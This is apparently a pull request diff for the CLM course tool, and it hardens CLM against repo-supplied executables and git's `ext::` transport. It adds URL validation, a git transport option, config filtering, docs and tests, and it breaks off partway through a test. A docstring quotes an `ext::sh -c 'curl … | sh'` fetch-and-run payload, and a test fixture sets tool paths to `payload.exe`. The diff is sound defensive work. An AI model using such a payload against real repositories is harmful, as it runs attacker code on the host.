### PR TITLE
security(config): a course repo may not choose which executable CLM runs (S5)

### DIFF
--- a/changelog.d/703-repo-supplied-executables.security.md
+++ b/changelog.d/703-repo-supplied-executables.security.md
@@ -1,0 +1,25 @@
+- **A course repo can no longer choose which program CLM runs.** `clm.toml` /
+  `.clm/config.toml` are discovered by walking up from the working directory, so
+  they are found *inside a cloned course repo* — and
+  `external_tools.drawio_executable` reached `subprocess` with no validation at
+  all: clone a course repo, run `clm build`, and a repo-supplied binary executes
+  on the first `.drawio` file, on the host, in every worker mode, before any of
+  that repo's own content runs. Both executable-path keys
+  (`external_tools.plantuml_jar`, `external_tools.drawio_executable`) are now
+  dropped from the *project* config tier with a warning naming the file; the
+  operator tiers (user config, `PLANTUML_JAR` / `DRAWIO_EXECUTABLE`) are
+  unchanged, and `CLM_ALLOW_PROJECT_TOOL_PATHS=1` opts back in per invocation —
+  an environment variable because a repo cannot set one.
+  `[jupyter] kernel_python` is deliberately still allowed from a project config
+  (it is documented, load-bearing, and selects the interpreter for the repo's own
+  notebook code, which a Direct-mode build executes on the host regardless).
+- **Git remote URLs derived from a course spec are validated, and the `ext::`
+  transport is disabled.** `<repository-base>` / `<remote-template>` become a URL
+  handed to `git clone` / `git ls-remote`, and git's `ext::<command>` transport
+  **executes its argument as a shell command** (`protocol.ext.allow` defaults to
+  `user`, i.e. allowed for exactly this kind of direct invocation). Derived URLs
+  are now checked against a scheme allowlist (`https`, `http`, `ssh`, `git`,
+  `file`, the scp-like `user@host:path` form, or a local path) with an error
+  naming the spec element, and every git invocation additionally runs with
+  `-c protocol.ext.allow=never` — which also covers remotes CLM never derived,
+  such as one hand-edited into an output repo's `.git/config`.

--- a/docs/claude/handovers/adversarial-review-remediation-handover.md
+++ b/docs/claude/handovers/adversarial-review-remediation-handover.md
@@ -889,7 +889,7 @@ migrated to the new decision format.
 
 ---
 
-### Phase 3a — Repo-supplied executables (S5, pulled forward)  ▸ STATUS: not started
+### Phase 3a — Repo-supplied executables (S5, pulled forward)  ▸ STATUS: S5 DONE 2026-07-26; S4/S8 ride-alongs not started
 
 **Why it is here.** Pulled out of Phase 4 by the maintainer on 2026-07-26. S5 is
 the same finding class as Phase 0's cassette RCE — content that arrives with a
@@ -907,7 +907,46 @@ back to an allowlist if that proves too restrictive. Same treatment for
 **Ride-alongs, if and only if they stay cheap**: S4 (the `.clm-include`
 `rmtree`) and S8 (MCP containment) are adjacent and both amount to reusing an
 existing correct normalizer. If either grows, split it back out to Phase 4
-rather than letting this phase sprawl.
+rather than letting this phase sprawl. **Not** done with S5 — they stayed out to
+keep the security change reviewable in one sitting, and neither is blocked.
+
+**Notes from S5 (2026-07-26)**
+
+- **The sub-decision splits, and the corpus is what splits it.** "Repo-local
+  config may not set executable paths" is right for
+  `external_tools.{plantuml_jar,drawio_executable}` — nothing uses them from a
+  repo — but **PythonCourses commits `clm.toml` with `[jupyter] kernel_python =
+  ".venv"`**, and it is load-bearing: it is what makes a *globally* installed clm
+  run the notebook kernel in the repo's own venv (where the ML stack lives).
+  Banning that would have broken the maintainer's primary course repo on the
+  first build. Read a course repo's `clm.toml` before restricting a config tier.
+- **And `kernel_python` closes nothing anyway.** It only takes effect when a
+  Direct-mode kernel executes *that same repo's* notebook code on the host — i.e.
+  in the one situation where arbitrary repo code already runs with the same
+  privileges. An attacker gains nothing by redirecting the interpreter that was
+  about to run their notebook. The tool paths are different: they fire on diagram
+  conversion, on the host, regardless of output target or worker mode, and
+  regardless of whether a single notebook is executed. **That asymmetry is the
+  argument for the split, and it is worth keeping in mind for the rest of Phase 4
+  — "content chooses a program" is only interesting where the content was not
+  already going to be executed.**
+- **`ext::` is two layers, deliberately.** `clm.core.remote_url.validate_remote_url`
+  rejects spec-derived URLs (error names the element), and every git invocation
+  now carries `-c protocol.ext.allow=never` — which covers URLs that never pass
+  through a spec, e.g. one hand-edited into an output repo's `.git/config`.
+  Neither layer alone is enough. Watch the ordering: the `-c` options must precede
+  the git subcommand, which is why they are prepended in `run_git`/`run_git_global`
+  rather than appended.
+- **A `::` check has to come before any scp-like fallback.** `ext::sh -c '…'`
+  parses as "host `ext`, path `:sh -c …`" under a naive `host:path` rule, so the
+  helper syntax must be refused first. Also: a **single-letter** scheme is a
+  Windows drive (`C:\repos\x`), so the bare-scheme pattern requires ≥2 characters.
+- **Two existing tests asserted the vulnerable behaviour** (`test_toml_file_loading`
+  and `test_all_config_options` both set `plantuml_jar` from a project-tier
+  `clm.toml`). They were rewritten to cover a non-restricted key, with the
+  restriction and its operator-tier escape hatches pinned in
+  `tests/infrastructure/test_repo_supplied_executables.py`. Expect this shape when
+  removing a capability: the test suite documents what *was* true.
 
 ---
 

--- a/docs/user-guide/configuration.md
+++ b/docs/user-guide/configuration.md
@@ -214,6 +214,23 @@ plantuml_jar = "/usr/local/share/plantuml.jar"
 drawio_executable = "/usr/bin/drawio"
 ```
 
+> **These two keys are ignored in a *project* config file.** `clm.toml` /
+> `.clm/config.toml` are found by walking up from the working directory, so they
+> are found **inside a cloned course repo** — and CLM then runs whatever program
+> they name, on the host, before any of that repo's content is executed. A
+> course repo does not get to choose that, so the keys are dropped from the
+> project tier with a warning naming the file; set them in your **user** config
+> (`clm config init`) or in the environment instead. If a repo genuinely needs to
+> supply the path (a vendored PlantUML JAR, say), the operator opts in per
+> invocation with `CLM_ALLOW_PROJECT_TOOL_PATHS=1` — an environment variable
+> precisely because the repo cannot set it.
+>
+> Only executable paths are restricted. Everything else in a project config,
+> including `[jupyter] kernel_python` (which points the Direct-mode notebook
+> kernel at a course venv — see below), keeps working: that one selects the
+> interpreter for the repo's *own* notebook code, which the build executes
+> anyway.
+
 (Docker workers use the tools baked into the worker image, so a host path does
 not apply to them.)
 

--- a/src/clm/cli/commands/git.py
+++ b/src/clm/cli/commands/git.py
@@ -35,6 +35,23 @@ TOKEN_AUTH_ENV_VAR = "CLM_GIT_TOKEN_AUTH"
 _TRUTHY = ("1", "true", "yes", "on")
 
 
+def _transport_safety_config_args() -> list[str]:
+    """``git -c`` options that stop a URL from being an execution vector (S5).
+
+    Git's ``ext::<command>`` transport **runs its argument as a shell command**,
+    and ``protocol.ext.allow`` defaults to ``user`` — i.e. allowed for exactly the
+    kind of direct invocation this module makes. Every remote URL CLM hands to git
+    ultimately comes from a course repo (``<repository-base>`` in the spec, or a
+    remote recorded in an output repo's ``.git/config``), so the transport itself
+    is pinned rather than trusted.
+
+    :func:`clm.core.remote_url.validate_remote_url` is the other layer: it rejects
+    the syntax where a *spec* produces it, with an error naming the spec element.
+    This one covers every path that never passes through a spec.
+    """
+    return ["-c", "protocol.ext.allow=never"]
+
+
 def _token_auth_config_args() -> list[str]:
     """``git -c`` options that authenticate HTTPS transport with the GitLab token.
 
@@ -153,7 +170,14 @@ def run_git(repo_path: Path, *args: str) -> subprocess.CompletedProcess[str]:
         CompletedProcess with stdout/stderr captured.
         In dry-run mode, returns a mock result with returncode=0.
     """
-    cmd = ["git", *_token_auth_config_args(), "-C", str(repo_path), *args]
+    cmd = [
+        "git",
+        *_transport_safety_config_args(),
+        *_token_auth_config_args(),
+        "-C",
+        str(repo_path),
+        *args,
+    ]
     logger.debug(f"Running: {_format_command(cmd)}")
 
     if _dry_run_mode.get():
@@ -183,7 +207,7 @@ def run_git_global(*args: str) -> subprocess.CompletedProcess[str]:
         CompletedProcess with stdout/stderr captured.
         In dry-run mode, returns a mock result with returncode=0.
     """
-    cmd = ["git", *_token_auth_config_args(), *args]
+    cmd = ["git", *_transport_safety_config_args(), *_token_auth_config_args(), *args]
     logger.debug(f"Running: {_format_command(cmd)}")
 
     if _dry_run_mode.get():

--- a/src/clm/cli/info_topics/commands.md
+++ b/src/clm/cli/info_topics/commands.md
@@ -2923,6 +2923,17 @@ Manage CLM configuration files.
 | `config locate` | Show configuration file locations |
 | `config show` | Show current configuration values (effective DB paths + config sections). Add `--json` for machine-readable output. |
 
+**A project config may not set an executable path (CLM {version}).** Project
+config (`clm.toml` / `.clm/config.toml`) is found by walking up from the working
+directory — i.e. *inside a cloned course repo* — so
+`external_tools.plantuml_jar` and `external_tools.drawio_executable` are ignored
+there (with a warning naming the file): CLM would otherwise run a program the
+course content chose, on the host, before any of that content executed. Set them
+in the **user** config or in the environment (`PLANTUML_JAR` /
+`DRAWIO_EXECUTABLE`), or opt in for one invocation with
+`CLM_ALLOW_PROJECT_TOOL_PATHS=1`. Every other project-config key is unaffected,
+including `[jupyter] kernel_python`.
+
 ### `clm cache` (CLM {version}+)
 
 Read-only build-cache inspection.

--- a/src/clm/cli/info_topics/migration.md
+++ b/src/clm/cli/info_topics/migration.md
@@ -2,6 +2,49 @@
 
 This guide covers breaking changes across major CLM versions.
 
+## A course repo can no longer choose which executable CLM runs ({version})
+
+**Breaking only for a course repo that sets an external-tool path in its own
+`clm.toml` / `.clm/config.toml`.** None of the maintained course repos does.
+
+Two keys are now **ignored** when they come from a *project* config file, with a
+warning naming the file:
+
+- `external_tools.plantuml_jar`
+- `external_tools.drawio_executable`
+
+Project config is discovered by walking up from the working directory, so it is
+found **inside a cloned course repo** — and CLM then runs the program it names,
+on the host, in every worker mode, before any of that repo's content executes.
+That is content choosing a binary, which is the same class as the cassette
+loader fixed in 1.22.1.
+
+Set these in your **user** config (`clm config init`) or in the environment
+(`PLANTUML_JAR` / `DRAWIO_EXECUTABLE`) instead — both unchanged. If a repo
+genuinely must supply the path (a vendored PlantUML JAR), the operator opts in
+per invocation:
+
+```
+CLM_ALLOW_PROJECT_TOOL_PATHS=1 clm build course.xml
+```
+
+An environment variable precisely because a repo cannot set one.
+
+**Not affected**: everything else in a project config, including
+`[jupyter] kernel_python`. That one points the Direct-mode notebook kernel at a
+course venv (PythonCourses commits `kernel_python = ".venv"`), and it selects the
+interpreter for the repo's *own* notebook code, which a Direct-mode build
+executes on the host anyway — restricting it would break a documented workflow
+and close nothing.
+
+**Git remote URLs are also validated now.** A URL derived from
+`<repository-base>` / `<remote-template>` must use `https`, `http`, `ssh`, `git`,
+`file`, the scp-like `user@host:path` form, or a local path. Git's
+`<helper>::<address>` remote-helper syntax is refused — the built-in `ext::`
+helper executes its argument as a shell command — and every git invocation now
+runs with `protocol.ext.allow=never`. A spec using such a URL fails at derivation
+with a message naming the element.
+
 ## `clm slides sync record` can now refuse a deck it used to bank ({version})
 
 **Breaking only for a deck whose separated voiceover companion carries a

--- a/src/clm/cli/info_topics/spec-files.md
+++ b/src/clm/cli/info_topics/spec-files.md
@@ -446,6 +446,14 @@ This element configures repository URLs derived from the top-level
 > remotes with `<project-slug>` + `<repository-base>` (and, if needed,
 > `<remote-path>`/`<remote-template>`) instead.
 
+> **Allowed URL forms (CLM {version}).** The derived URL must use one of
+> `https`, `http`, `ssh`, `git`, `file`, the scp-like `user@host:path` form, or a
+> local path. Git's `<helper>::<address>` remote-helper syntax is **refused**,
+> because the built-in `ext::` helper executes its argument as a shell command —
+> a spec is content, and content does not get to run programs. A refused value
+> fails at derivation with a message naming the element, and every git invocation
+> additionally runs with `protocol.ext.allow=never`.
+
 URL derivation (requires `<project-slug>`; `<repository-base>` is required only
 when the active template references `{repository_base}` — a self-contained
 `<remote-template>` such as `git@host:{remote_path}/{repo}.git` needs no base):

--- a/src/clm/core/course_spec.py
+++ b/src/clm/core/course_spec.py
@@ -9,6 +9,7 @@ from xml.etree import ElementTree as ETree
 
 from attr import Factory, field, frozen
 
+from clm.core.remote_url import validate_remote_url
 from clm.core.utils.text_utils import Text, sanitize_file_name
 
 logger = logging.getLogger(__name__)
@@ -809,13 +810,16 @@ class GitHubSpec:
         # forced to also carry a placeholder ``<repository-base>``.
         if "{repository_base}" in template and not self.repository_base:
             return None
-        return template.format(
-            repository_base=self.repository_base,
-            remote_path=effective_remote_path,
-            repo=repo,
-            slug=slug,
-            lang=language,
-            suffix=suffix,
+        return validate_remote_url(
+            template.format(
+                repository_base=self.repository_base,
+                remote_path=effective_remote_path,
+                repo=repo,
+                slug=slug,
+                lang=language,
+                suffix=suffix,
+            ),
+            source="<repository-base>/<remote-template> in the course spec",
         )
 
     def derive_channel_remote_url(
@@ -869,14 +873,17 @@ class GitHubSpec:
                 template = "{repository_base}/{remote_path}/{repo}"
             else:
                 template = "{repository_base}/{repo}"
-        return template.format(
-            repository_base=self.repository_base,
-            remote_path=effective_remote_path,
-            repo=repo,
-            slug=slug,
-            lang=language,
-            suffix="",
-            stream=stream,
+        return validate_remote_url(
+            template.format(
+                repository_base=self.repository_base,
+                remote_path=effective_remote_path,
+                repo=repo,
+                slug=slug,
+                lang=language,
+                suffix="",
+                stream=stream,
+            ),
+            source="<repository-base>/<remote-template> in the course spec",
         )
 
 

--- a/src/clm/core/remote_url.py
+++ b/src/clm/core/remote_url.py
@@ -1,0 +1,86 @@
+"""Validation for git remote URLs derived from a course spec (S5).
+
+``<repository-base>`` / ``<remote-template>`` come out of the course spec — a
+file that ships with the course content — and the derived URL is handed to
+``git clone`` / ``git ls-remote``. Git URLs are not inert: the syntax
+``<helper>::<address>`` selects a *remote helper*, and the built-in ``ext::``
+helper **executes its argument as a shell command**. So
+``<repository-base>ext::sh -c 'curl … | sh'</repository-base>`` turns a
+``clm git`` invocation into code execution, with nothing else in the spec
+looking unusual.
+
+This module is the scheme allowlist. It is one of two layers, deliberately:
+
+1. **Here** — spec-derived URLs are validated when they are composed, so the
+   error names the spec element and the offending value rather than surfacing as
+   a confusing git failure (or not surfacing at all).
+2. **Transport** — every git invocation in ``clm.cli.commands.git`` passes
+   ``-c protocol.ext.allow=never``, which also covers URLs this module never
+   sees (a hand-edited ``.git/config`` remote in an output repo, a submodule).
+
+Neither layer alone is enough: (1) cannot see URLs that do not come from a spec,
+and (2) would let a bad spec value fail late and cryptically.
+"""
+
+from __future__ import annotations
+
+import re
+
+#: URL schemes a spec may name. ``http`` is included because internal GitLab
+#: instances are still reachable that way; ``file`` because a local bare repo is
+#: a legitimate (and test-friendly) remote. Everything not listed — notably any
+#: ``<helper>::<address>`` form — is refused.
+ALLOWED_SCHEMES = ("https", "http", "ssh", "git", "file")
+
+#: ``scheme://rest`` where scheme is alphanumeric-ish, per RFC 3986.
+_SCHEME_RE = re.compile(r"^(?P<scheme>[A-Za-z][A-Za-z0-9+.\-]*)://")
+
+#: A bare ``scheme:rest`` (no slashes) — how ``ext:``-style and mailto-style
+#: values look. A single-letter scheme is a Windows drive letter, not a scheme.
+_BARE_SCHEME_RE = re.compile(r"^(?P<scheme>[A-Za-z][A-Za-z0-9+.\-]+):(?!//)")
+
+
+class RemoteUrlError(ValueError):
+    """A git remote URL a course spec is not allowed to produce."""
+
+
+def validate_remote_url(url: str, *, source: str = "the course spec") -> str:
+    """Return ``url`` unchanged, or raise :class:`RemoteUrlError`.
+
+    Accepted: ``https`` / ``http`` / ``ssh`` / ``git`` / ``file`` URLs, the
+    scp-like ``user@host:path`` form git also understands, and a plain local
+    path (including a Windows drive path). Refused: a remote-helper
+    ``<helper>::<address>`` value, any other scheme, an empty value, and
+    anything starting with ``-`` (which git would read as an option).
+    """
+    candidate = url.strip()
+    if not candidate:
+        raise RemoteUrlError(f"{source} produced an empty git remote URL")
+    if candidate.startswith("-"):
+        raise RemoteUrlError(
+            f"{source} produced the git remote URL {url!r}, which starts with '-' "
+            "and would be read by git as a command-line option"
+        )
+    if "::" in candidate:
+        # The remote-helper form. `ext::` executes its argument; the others are
+        # not needed by any CLM workflow, so the whole syntax is refused rather
+        # than allowlisted helper-by-helper.
+        raise RemoteUrlError(
+            f"{source} produced the git remote URL {url!r}, which uses git's "
+            "'<helper>::<address>' remote-helper syntax. That is refused: the "
+            "built-in 'ext::' helper executes its argument as a shell command. "
+            f"Use one of {', '.join(ALLOWED_SCHEMES)} or the user@host:path form."
+        )
+    match = _SCHEME_RE.match(candidate) or _BARE_SCHEME_RE.match(candidate)
+    if match is not None:
+        scheme = match.group("scheme").lower()
+        if scheme not in ALLOWED_SCHEMES:
+            raise RemoteUrlError(
+                f"{source} produced the git remote URL {url!r}, whose scheme "
+                f"{scheme!r} is not allowed. Allowed: "
+                f"{', '.join(ALLOWED_SCHEMES)}, the user@host:path form, or a "
+                "local path."
+            )
+    # No scheme: scp-like (`git@host:path`), a local path, or a Windows drive
+    # path (`C:\repos\x`) — all inert, all legitimate.
+    return url

--- a/src/clm/infrastructure/config.py
+++ b/src/clm/infrastructure/config.py
@@ -51,6 +51,87 @@ DEFAULT_WORKER_IMAGES = {
 }
 
 
+#: Config keys a **repo-local** config file may not set: they name a program CLM
+#: runs (S5 of the 2026-07-24 adversarial review). `clm.toml` / `.clm/config.toml`
+#: are discovered *inside the course repo* by walking up from cwd, so without this
+#: a clone-and-build hands a repo-supplied binary to the first `.drawio` file — and
+#: it runs on the **host**, in every worker mode, whether or not the build executes
+#: a single notebook. Operator channels (user / system config, the environment) are
+#: unaffected; that is the whole distinction. See :data:`ALLOW_PROJECT_TOOL_PATHS_ENV_VAR`.
+#:
+#: Deliberately *not* on this list: ``jupyter.kernel_python``. It is a documented,
+#: load-bearing repo-local setting (PythonCourses commits ``kernel_python = ".venv"``
+#: so a globally-installed clm runs the notebook kernel in the repo's own venv), and
+#: it only takes effect when a Direct-mode kernel executes that same repo's notebook
+#: code on the host anyway — so banning it would break a real workflow to close
+#: nothing. See ``docs/user-guide/configuration.md``.
+PROJECT_FORBIDDEN_KEYS: tuple[tuple[str, str], ...] = (
+    ("external_tools", "plantuml_jar"),
+    ("external_tools", "drawio_executable"),
+)
+
+#: Set to ``1``/``true``/``yes`` to let the repo-local config set the keys above
+#: after all (e.g. a course repo that genuinely vendors its own PlantUML JAR). An
+#: env var is the right channel because it comes from the operator, not the repo.
+ALLOW_PROJECT_TOOL_PATHS_ENV_VAR = "CLM_ALLOW_PROJECT_TOOL_PATHS"
+
+_TRUTHY = ("1", "true", "yes", "on")
+
+
+def project_tool_paths_allowed() -> bool:
+    """Whether repo-local config may set the executable paths (opt-in, env-only)."""
+    return os.environ.get(ALLOW_PROJECT_TOOL_PATHS_ENV_VAR, "").strip().lower() in _TRUTHY
+
+
+def strip_project_forbidden_keys(data: dict[str, Any], source: Path | None) -> dict[str, Any]:
+    """Drop :data:`PROJECT_FORBIDDEN_KEYS` from a repo-local config's parsed data.
+
+    Returns a shallow-copied structure with the offending keys removed and a
+    WARNING logged per key naming the file — silence here would turn "my tool path
+    is ignored" into a mystery. A no-op when the opt-in env var is set, or when the
+    file sets none of the keys (the overwhelmingly common case).
+    """
+    if project_tool_paths_allowed():
+        return data
+    stripped: dict[str, Any] = data
+    for section, key in PROJECT_FORBIDDEN_KEYS:
+        table = stripped.get(section)
+        if not isinstance(table, dict) or key not in table:
+            continue
+        if stripped is data:  # copy lazily — only when there is something to strip
+            stripped = {k: (dict(v) if isinstance(v, dict) else v) for k, v in data.items()}
+            table = stripped[section]
+        value = table.pop(key)
+        logger.warning(
+            "Ignoring %s.%s = %r from the project config %s: a repo-local config "
+            "file may not choose which executable CLM runs. Set it in your user "
+            "config (`clm config init`) or the environment instead, or set %s=1 to "
+            "allow it for this invocation.",
+            section,
+            key,
+            value,
+            source if source is not None else "(project config)",
+            ALLOW_PROJECT_TOOL_PATHS_ENV_VAR,
+        )
+    return stripped
+
+
+class ProjectTomlConfigSettingsSource(TomlConfigSettingsSource):
+    """The repo-local TOML source, with executable paths stripped (S5).
+
+    The one settings source whose file arrives with the *content* being built, so
+    it is the one source that does not get to say which program runs. Everything
+    else about it is an ordinary ``TomlConfigSettingsSource``.
+    """
+
+    def __init__(self, settings_cls: type[BaseSettings], toml_file: Path) -> None:
+        super().__init__(settings_cls, toml_file=toml_file)
+        self._clm_source_path = toml_file
+
+    def __call__(self) -> dict[str, Any]:
+        return strip_project_forbidden_keys(super().__call__(), self._clm_source_path)
+
+
 class LegacyEnvSettingsSource(PydanticBaseSettingsSource):
     """Custom settings source to handle legacy environment variables.
 
@@ -873,11 +954,13 @@ class ClmConfig(BaseSettings):
             except Exception as e:
                 logger.debug(f"Could not load user config: {e}")
 
-        # Project config (highest priority TOML file)
+        # Project config (highest priority TOML file). Loaded through the
+        # filtering source: this file ships inside the course repo, so it may
+        # not name an executable (S5) — see ProjectTomlConfigSettingsSource.
         if config_files["project"]:
             try:
                 toml_sources.append(
-                    TomlConfigSettingsSource(
+                    ProjectTomlConfigSettingsSource(
                         settings_cls,
                         toml_file=config_files["project"],
                     )
@@ -1088,6 +1171,11 @@ auto_cleanup_on_session_start = true
 auto_vacuum_after_cleanup = false
 
 [external_tools]
+# NOTE: these two keys are IGNORED in a *project* config (clm.toml /
+# .clm/config.toml) — a course repo does not get to choose which program CLM
+# runs on the host. Set them in your user config or in the environment; to
+# override for one invocation, CLM_ALLOW_PROJECT_TOOL_PATHS=1.
+#
 # Path to PlantUML JAR file
 # Environment variable: PLANTUML_JAR (no CLM_ prefix)
 # Example: plantuml_jar = "/usr/local/share/plantuml-1.2024.6.jar"

--- a/tests/cli/test_git_ops.py
+++ b/tests/cli/test_git_ops.py
@@ -22,6 +22,11 @@ from clm.cli.commands.git import (
 )
 from clm.core.course_spec import GitHubSpec, OutputTargetSpec
 
+#: Every git invocation leads with this (S5): git's ``ext::`` transport executes
+#: its argument, and the remote URLs CLM passes come from course repos. Pinned on
+#: its own in tests/infrastructure/test_repo_supplied_executables.py.
+_SAFE_TRANSPORT = ["-c", "protocol.ext.allow=never"]
+
 
 class TestGitHubSpec:
     """Tests for GitHubSpec class."""
@@ -722,7 +727,16 @@ class TestGitHelpers:
             mock_run.return_value = subprocess.CompletedProcess([], 0, "", "")
             run_git(tmp_path, "push", "-u", "origin", "master")
             cmd = mock_run.call_args[0][0]
-        assert cmd == ["git", "-C", str(tmp_path), "push", "-u", "origin", "master"]
+        assert cmd == [
+            "git",
+            *_SAFE_TRANSPORT,
+            "-C",
+            str(tmp_path),
+            "push",
+            "-u",
+            "origin",
+            "master",
+        ]
 
     def test_token_auth_injects_credential_helper(self, monkeypatch, tmp_path: Path):
         """CLM_GIT_TOKEN_AUTH=1 + token injects the ephemeral helper (#341)."""
@@ -734,7 +748,8 @@ class TestGitHelpers:
             cmd = mock_run.call_args[0][0]
         # Empty first helper clears configured helpers (GCM); the second one
         # reads the token from the environment — never from the command line.
-        assert cmd[1:5] == [
+        assert cmd[1:3] == _SAFE_TRANSPORT
+        assert cmd[3:7] == [
             "-c",
             "credential.helper=",
             "-c",
@@ -750,8 +765,8 @@ class TestGitHelpers:
             mock_run.return_value = subprocess.CompletedProcess([], 0, "", "")
             run_git_global("ls-remote", "https://gitlab.example.com/g/repo.git")
             cmd = mock_run.call_args[0][0]
-        assert cmd[1:3] == ["-c", "credential.helper="]
-        assert "$GITLAB_TOKEN" in cmd[4]
+        assert cmd[1:5] == [*_SAFE_TRANSPORT, "-c", "credential.helper="]
+        assert "$GITLAB_TOKEN" in cmd[6]
 
     def test_token_auth_without_token_is_a_no_op(self, monkeypatch, tmp_path: Path):
         monkeypatch.setenv("CLM_GIT_TOKEN_AUTH", "1")
@@ -761,7 +776,7 @@ class TestGitHelpers:
             mock_run.return_value = subprocess.CompletedProcess([], 0, "", "")
             run_git(tmp_path, "fetch", "origin")
             cmd = mock_run.call_args[0][0]
-        assert cmd == ["git", "-C", str(tmp_path), "fetch", "origin"]
+        assert cmd == ["git", *_SAFE_TRANSPORT, "-C", str(tmp_path), "fetch", "origin"]
 
     def test_remote_exists_true(self):
         """Test remote_exists returns True for existing remote."""

--- a/tests/infrastructure/test_config.py
+++ b/tests/infrastructure/test_config.py
@@ -171,14 +171,16 @@ class TestConfigurationFiles:
         for var in ["PLANTUML_JAR", "DRAWIO_EXECUTABLE"]:
             monkeypatch.delenv(var, raising=False)
 
-        # Create a temporary config file
+        # Create a temporary config file. NB `external_tools` is deliberately not
+        # exercised here: a repo-local config may no longer set an executable path
+        # (S5) — see TestProjectConfigMayNotChooseExecutables.
         config_file = tmp_path / "clm.toml"
         config_file.write_text("""
 [logging]
 log_level = "WARNING"
 
-[external_tools]
-plantuml_jar = "/custom/plantuml.jar"
+[jupyter]
+kernel_python = ".venv"
 """)
 
         # Change to temp directory so config file is found
@@ -186,7 +188,7 @@ plantuml_jar = "/custom/plantuml.jar"
 
         config = ClmConfig()
         assert config.logging.log_level == "WARNING"
-        assert config.external_tools.plantuml_jar == "/custom/plantuml.jar"
+        assert config.jupyter.kernel_python == ".venv"
 
     def test_dotclm_directory_config(self, tmp_path, monkeypatch):
         """Test loading configuration from .clm/config.toml."""
@@ -442,12 +444,11 @@ plantuml_jar = "/project/plantuml.jar"
         for var in env_vars_to_clear:
             monkeypatch.delenv(var, raising=False)
 
+        # `external_tools` intentionally absent: a repo-local config may no longer
+        # set an executable path (S5). The user tier and the environment still can
+        # — pinned in tests/infrastructure/test_repo_supplied_executables.py.
         config_file = tmp_path / "clm.toml"
         config_file.write_text("""
-[external_tools]
-plantuml_jar = "/test/plantuml.jar"
-drawio_executable = "/test/drawio"
-
 [logging]
 log_level = "DEBUG"
 enable_test_logging = true
@@ -472,8 +473,6 @@ worker_id = "test-worker-1"
         config = ClmConfig()
 
         # Verify all settings were loaded
-        assert config.external_tools.plantuml_jar == "/test/plantuml.jar"
-        assert config.external_tools.drawio_executable == "/test/drawio"
         assert config.logging.log_level == "DEBUG"
         assert config.logging.enable_test_logging is True
         assert config.progress.update_interval == 5

--- a/tests/infrastructure/test_repo_supplied_executables.py
+++ b/tests/infrastructure/test_repo_supplied_executables.py
@@ -1,0 +1,255 @@
+"""A course repo may not choose which program CLM runs — finding S5.
+
+`clm.toml` / `.clm/config.toml` are discovered by walking up from cwd, so they
+are found *inside a cloned course repo*, and `external_tools.drawio_executable`
+reached `subprocess` with no validation: clone, `clm build`, and a repo-supplied
+binary runs on the first `.drawio` file — on the **host**, in every worker mode,
+whether or not the build executes a single notebook.
+
+The same shape via git: `<repository-base>` in the spec becomes a URL handed to
+`git clone` / `git ls-remote`, and git's `ext::<command>` transport executes its
+argument as a shell command (`protocol.ext.allow` defaults to `user`, i.e.
+allowed for exactly this kind of direct invocation).
+
+Pinned here:
+
+* the two executable-path keys are dropped from the **project** tier, with a
+  WARNING naming the file, and survive in the operator tiers (user config, env);
+* `jupyter.kernel_python` is deliberately **not** filtered (documented,
+  load-bearing, and it selects the interpreter for that same repo's notebook
+  code, which a Direct-mode build executes on the host regardless);
+* the remote-URL allowlist refuses `ext::` and friends, at the spec and at the
+  transport.
+"""
+
+from __future__ import annotations
+
+import logging
+from pathlib import Path
+
+import pytest
+
+from clm.core.remote_url import RemoteUrlError, validate_remote_url
+from clm.infrastructure.config import (
+    ALLOW_PROJECT_TOOL_PATHS_ENV_VAR,
+    ClmConfig,
+    strip_project_forbidden_keys,
+)
+
+_HOSTILE_TOML = """
+[logging]
+log_level = "WARNING"
+
+[external_tools]
+drawio_executable = "./payload.exe"
+plantuml_jar = "./payload.jar"
+"""
+
+
+def _clear_tool_env(monkeypatch: pytest.MonkeyPatch) -> None:
+    for var in ("PLANTUML_JAR", "DRAWIO_EXECUTABLE", ALLOW_PROJECT_TOOL_PATHS_ENV_VAR):
+        monkeypatch.delenv(var, raising=False)
+
+
+class TestProjectConfigMayNotChooseExecutables:
+    def test_repo_local_clm_toml_cannot_set_the_tool_paths(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, caplog
+    ) -> None:
+        _clear_tool_env(monkeypatch)
+        (tmp_path / "clm.toml").write_text(_HOSTILE_TOML, encoding="utf-8")
+        monkeypatch.chdir(tmp_path)
+
+        with caplog.at_level(logging.WARNING, logger="clm.infrastructure.config"):
+            config = ClmConfig()
+
+        assert config.external_tools.drawio_executable == ""
+        assert config.external_tools.plantuml_jar == ""
+        # The rest of the file still applies — this is a key filter, not a
+        # "reject the whole config" sledgehammer.
+        assert config.logging.log_level == "WARNING"
+        # Silence would turn "my tool path is ignored" into a mystery.
+        warnings = [r.message for r in caplog.records if "may not choose" in r.message]
+        assert len(warnings) == 2, caplog.text
+        assert any("drawio_executable" in m and "clm.toml" in m for m in warnings)
+        assert all(ALLOW_PROJECT_TOOL_PATHS_ENV_VAR in m for m in warnings)
+
+    def test_dotclm_config_is_filtered_too(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        """Both project-tier filenames, not just the one the finding named."""
+        _clear_tool_env(monkeypatch)
+        clm_dir = tmp_path / ".clm"
+        clm_dir.mkdir()
+        (clm_dir / "config.toml").write_text(_HOSTILE_TOML, encoding="utf-8")
+        monkeypatch.chdir(tmp_path)
+
+        assert ClmConfig().external_tools.drawio_executable == ""
+
+    def test_the_env_var_opt_in_restores_it(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        """The escape hatch is env-only — a channel the repo cannot write to."""
+        _clear_tool_env(monkeypatch)
+        (tmp_path / "clm.toml").write_text(_HOSTILE_TOML, encoding="utf-8")
+        monkeypatch.chdir(tmp_path)
+        monkeypatch.setenv(ALLOW_PROJECT_TOOL_PATHS_ENV_VAR, "1")
+
+        assert ClmConfig().external_tools.drawio_executable == "./payload.exe"
+
+    def test_the_user_tier_still_sets_the_tool_paths(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        """Only the repo-local tier is filtered — that is the whole distinction."""
+        _clear_tool_env(monkeypatch)
+        user_config = tmp_path / "user-config.toml"
+        user_config.write_text(_HOSTILE_TOML, encoding="utf-8")
+        monkeypatch.setattr(
+            "clm.infrastructure.config.find_config_files",
+            lambda: {"system": None, "user": user_config, "project": None},
+        )
+
+        config = ClmConfig()
+        assert config.external_tools.drawio_executable == "./payload.exe"
+        assert config.external_tools.plantuml_jar == "./payload.jar"
+
+    def test_the_environment_still_sets_the_tool_paths(
